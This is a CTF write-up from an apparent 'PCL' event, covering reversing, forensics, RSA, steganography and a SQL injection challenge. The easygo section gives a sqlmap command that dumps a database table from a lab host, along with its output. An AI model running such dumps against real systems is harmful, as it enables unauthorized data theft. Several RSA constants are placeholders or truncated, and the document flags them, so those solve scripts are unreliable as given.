PCL Two By M1o
baby_re
java逆向
native层so逆向
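#include <iostream>
#include <string>

// Decode the baby_re ciphertext: every byte of `enc` is XORed with a
// repeating 4-word key. Per the author's inline notes, the key words and
// their XOR adjustment come from the native (.so) layer and the ciphertext
// from the Java layer.
int main() {
    // Key words as they appear in the native layer, before adjustment.
    unsigned int key[4] = {0x00000056, 0x00000057, 0x00000058, 0x00000059};

    // Ciphertext bytes as they appear in the Java layer.
    const unsigned int enc[38] = {
        119, 9,  40, 44,  106, 83, 126, 123, 33,  87, 113, 123, 112,
        93,  125, 127, 41, 82,  44, 127, 39,  3,   126, 125, 119, 87,
        47,  125, 33,  6,  44,  127, 112, 0,  126, 123, 115, 24};
    const int enc_len = sizeof(enc) / sizeof(enc[0]);

    // Adjustment the native layer applies to the key before it is used.
    key[0] ^= 'G';
    key[1] ^= '2';
    key[2] ^= '\x11';
    key[3] ^= '\x12';

    // Collect the plaintext in a std::string. The original streamed a
    // 38-byte unsigned char array with no terminating NUL, so operator<<
    // kept reading past the end of the buffer.
    std::string dec;
    dec.reserve(enc_len);
    for (int i = 0; i < enc_len; ++i) {
        // Only the low 8 bits are meaningful, as in the original
        // assignment into an unsigned char.
        dec.push_back(static_cast<char>(
            static_cast<unsigned char>(enc[i] ^ key[i % 4])));
    }

    std::cout << dec;
    return 0;
}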
简单取证
桌面 secret.png
cmd: echo password = 62b041223bb9a
secret.png 内为base64解码逆序 -> zip + password -> txt
txt内为坐标
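"""Plot the coordinate pairs from flag.txt as filled cells in a spreadsheet.

Each non-empty line of flag.txt is read as "<first> <second>"; the cell at
(first + 1, second + 1) receives the string '1'. The author then scans the
resulting pattern as a QR code.
"""
import xlsxwriter as xlwt

book = xlwt.Workbook('ctfcode.xlsx')
table = book.add_worksheet('flag_code')

with open('flag.txt', 'r') as f:
    lines = f.read().split("\n")

for line in lines:
    fields = line.split()
    # A trailing newline or blank line yields an empty entry; the original
    # passed it to int() and stopped with ValueError before book.close().
    if not fields:
        continue
    # xlsxwriter's worksheet.write() takes (row, col, value); the original
    # passes the first field as the row and the second as the column.
    table.write(int(fields[0]) + 1, int(fields[1]) + 1, '1')

book.close()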
扫码得flag
easy_rsa
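from Crypto.Util.number import *
import gmpy2

# NOTE(review): every constant below is reproduced exactly as printed on the
# page. The factors in decrypt2/decrypt3 are visibly reduced to placeholders
# (`000`, `9`, `0000`), and the long hex strings may have lost digits as well;
# confirm all of them against the original challenge files.


def _check_factors(n, p, q, where):
    """Raise ValueError unless p * q == n.

    With the placeholder factors printed on the page the RSA private exponent
    would be computed from the wrong phi (and decrypt3 would divide by zero),
    so fail early with an explicit message instead.
    """
    if p * q != n:
        raise ValueError(
            where + ": p*q != n; fill in the recovered factors before running"
        )


def decrypt1():
    """Decrypt part 1, where e and phi share the common factor t.

    The exponent is reduced to e // t before inversion, so the modular power
    gives m**t; the plaintext is the exact integer t-th root of that value.
    Returns the plaintext bytes, or None when the root is not exact.
    """
    c = int("27455f081ecdad3302ae359c9fb46dc601eee98f0eadbbdebfbcd1b670fa171b30316abb9999f3b80de32843afdfd30505b1f4166a03cee9fc48902b74b6e850cfd268e6917c5d84e64f7e7cd0e4a30bfe5903fb5d821d27fdc817d9c4536a8e7aea55af266abcae857a8ffff2fbaba1b44091a137c69c471c123ab0b80e250e055959c468e6e37c005105ecd7c8b48ce5e251df3eeff5da7b3d561cd98150da3575a16bee5f2524d2795fd45c1e96efc085ed45fb5f02c027aee5bca3aad0eb3e23376c0cd18b02fb05a1ff8fb1af0a3ce4bbe", 16)
    p = int("bb602e402b68a5cfcc5cfcc63cc82e362e98cbea4bbc2dad4fec7ec33f1faec04926f0c253f56ab4c4dde6d71627fbc9ef42425b70e5ecd55314e744aab7d1ba86d1e0e21920a0bfe7d598bd09c3c377ab7c6cfea5bfdd7c16305baed0f0a31ad688bd", 16)
    q = int("bb8d1ea24a3462ae6ec28e79f96a95770dafc95ffffa19c7c3a3786a6accba7b1a28a4fe69e558beb38e799c723ab7fdd7be14b330b118ae60e3b44483a4c94a556e810ab94bbbd0100d7c20e7494e20e0c1030e016603bd2a06c1f6e92998ab68e2d420faf47f3ee687fb6d1", 16)
    e = int("292", 16)
    n = p * q
    phi = (p - 1) * (q - 1)
    t = gmpy2.gcd(e, phi)
    d = gmpy2.invert(e // t, phi)
    m = pow(c, d, n)
    # iroot returns (root, is_exact).
    root, exact = gmpy2.iroot(m, t)
    if exact:
        return long_to_bytes(root)
    # Same result as the original's implicit fall-through.
    return None


# Author's note: p and q were obtained with a high-bits attack.
def decrypt2():
    """Decrypt part 2 with textbook RSA once p and q are known."""
    c = int("3a80caebcee814e74a9d3d81b08b1130bed6edde2c0e1116abfbc1a234b9765edfc47a9d634ed4458c9b9a0d399b870adbaa2337ac62940ade08daa8a7492cdedf854d4d3a05705dba1ec623a10bd60596e891ccc7b9364fbf2eaa2392fdec0b8f7efc66e94e3f8a6f372da2235ebf2fc77c163abcac5b63cc9904d9b13c0eda6462b99dd01e8230fdfee7bca5b356ddb37ec4ec926a4e07a2bfe76b9cbbfa4b5b010ddf3e2f23b4ec42b8c8433fa4811bf1dcbeafad54a9b539feb4fdafab67034ef", 16)
    n = int("841a5a012c104e600eca17b451d5fd37c063ada2e88f36a07e9ad66e99f35b11580cbe8b0a212ec464a6393c5895b1f97885f23ea12d2069eb6dc3cb4199fb8c6e80a4a94561c6c3499c3c02d9dc9cf216c0f44dc91701a6d9ec89981f261aaf1da588a26edd5739b32540ca6dc1ec3b035043bca06ccb489f72fcd1aa856e1cffe7f9a16bd19030d1e00095f1fd977cf4f23e47b55650ca4712d1eb089d92df032e5180d05311c938a44decc6070cd01af4c6144cdab2526e5cb919a1828bec6a4f3332bf1fa4f1c9d3516fbb158fd4fbcf8b0e67eff944efa97f5b24f9aa65", 16)
    e = 65537
    # Placeholders as printed on the page; the recovered factors are missing.
    p = 000
    q = 9
    _check_factors(n, p, q, "decrypt2")
    phi = (p - 1) * (q - 1)
    d = gmpy2.invert(e, phi)
    m = pow(c, d, n)
    return long_to_bytes(m)


# Author's note: n and c are not coprime, which yields p and q.
def decrypt3():
    """Decrypt part 3, then divide out the factor 2022 * 1011 * p.

    The final integer division is taken from the original script; how the
    plaintext was padded is not shown on the page.
    """
    c = int("1bd2a47a5d275ba6356e1e2bd10d6cbe540e9318c746e807a7672f3a75ccd7dba52d7f6f9cf0f8dce9705fc1785cc670b2658b05d4b24d8918fbfa920c8ffe73160c2c313b3fdbc4541ece34afa7d05271cc6fd59d08138b88c11677e6ac3b39cff525dcb19694b0388d895f53805a5e5bd8cfbe4855aaf83ebd85af7d76dcb44a2e4bdbcee7a6c1e9af411e234f130e68ad3ec647e50f65cb81393f4bd38389a2b9010fdb9054dc235acedb77a5606faf0c1ea3c7cf0d304f885d86081f8bac8b67b0f75448c5b6eb8f1cc8a0df", 16)
    n = int("c2b17c86a8950f6dafe0ae4271cfb20c5ffda2d6b3d035afa655ed05ec16c67b18832ed887f2cea83056af079cc75c2ce43c90cce3ed02c2e07d256ff1734adeee6dc2b3b4bbf6dcfc68518d0a74e3e66f1865db95efec2321ac97f3b8e3d8de9fc9145a30a3e24e7ca9944c1e94d301c99e6189f4aa6a86f67f1d9b8fb0de4225e005bd27594cd33e36622b2cd8eb2781f0c24d33267d9fb681aab81f39d1b4a73bd17431b46a89a0e4c2c58b1e24ec63bd3fff7a16f6ef80eada3ef1db0dd2f76bfdb31979c5d1fd03f75d9d8f1c5069", 16)
    e = 65537
    # Placeholders as printed on the page; the recovered factors are missing.
    q = 0000
    p = 000
    # Also protects the division below, which used p == 0 in the original.
    _check_factors(n, p, q, "decrypt3")
    phi = (p - 1) * (q - 1)
    d = gmpy2.invert(e, phi)
    M = pow(c, d, n)
    m = M // (2022 * 1011 * p)
    return long_to_bytes(m)


if __name__ == '__main__':
    # The three parts are concatenated into a single byte string.
    print(decrypt1() + decrypt2() + decrypt3())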
baby_rsa
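"""baby_rsa solve script, restored from a single collapsed line.

NOTE(review): the numeric constants are reproduced with exactly the digits
printed on the page. `09377`, `09270`, the range bounds and `p = 0` look like
remnants of much longer numbers, so the script cannot produce a result until
they are replaced with the values from the original challenge.
"""
from Crypto.Util.number import *
import gmpy2

e = 1049
# Printed as the bare literals `09377` and `09270`, which Python 3 rejects
# because of the leading zero; parsed from strings so the digits stay as shown.
x = int("09377")
c = int("09270")
n = (pow(2, e) - x)

# Trial division for q over a narrow window (bounds presumably truncated).
for q in range(215, 216):
    if n % q == 0:
        break
p = n // q

# yafu
# NOTE(review): the page reads `# yafu p = 0`; whether `p = 0` was part of the
# comment or a separate assignment cannot be recovered. It is kept as an
# assignment here - confirm against the original script.
p = 0

# Stop with a clear message instead of the ZeroDivisionError that `% p`
# raises below while p and q are still placeholders.
if p * q != n:
    raise SystemExit("baby_rsa: p*q != n; fill in the real constants first")

d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)

# Multiply the decrypted value by every integer in [p - q, p) modulo p, then
# negate modulo p, exactly as the original script does.
for i in range(p - q, p):
    m = m * i % p
print(long_to_bytes(-m % p))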
easygo
python sqlmap.py -u http://192.168.1.115:8080/juice/2342 -D public -T super_secret_table -dump
sqlmap一把梭
[17:35:58] [INFO] fetching columns for table 'super_secret_table' in database 'public'
[17:35:58] [INFO] fetching entries for table 'super_secret_table' in database 'public'
Database: public
Table: super_secret_table
[1 entry]
+-----------------------------------+
| flag                              |
+-----------------------------------+
| PCL{Postgresql_1njection_1s_3asY} |
+-----------------------------------+
马后炮篇
Misc_water
ʍɐʇǝɹ‾dıɔʇnɹǝ.png 藏了两张图 最后一张无用
其具体文件格式为 png+jpg(reverse)+png
其中jpg为盲水印(傅里叶变换)
得到压缩包密码 ZC4#QaWbW
得到jpg(实则png)crc爆破即可还原
babybit
虚拟硬盘镜像 回收站翻到备份压缩包
用工具打开
Value Name            Value Type    Data
OsvEncryptComplete    RegQword
OsvEncryptInit        RegQword
(Data 列的数值在本页中缺失)
中国时区 utc+8
Windows NT 时间(FILETIME)表示从1602年1月1日UTC时间开始的100纳秒数。(注:微软文档中 FILETIME 的起点为 1601年1月1日 UTC,换算时请以此核对;先将 RegQword 值换算为 UTC 时间,再加 8 小时得到中国时区时间。)
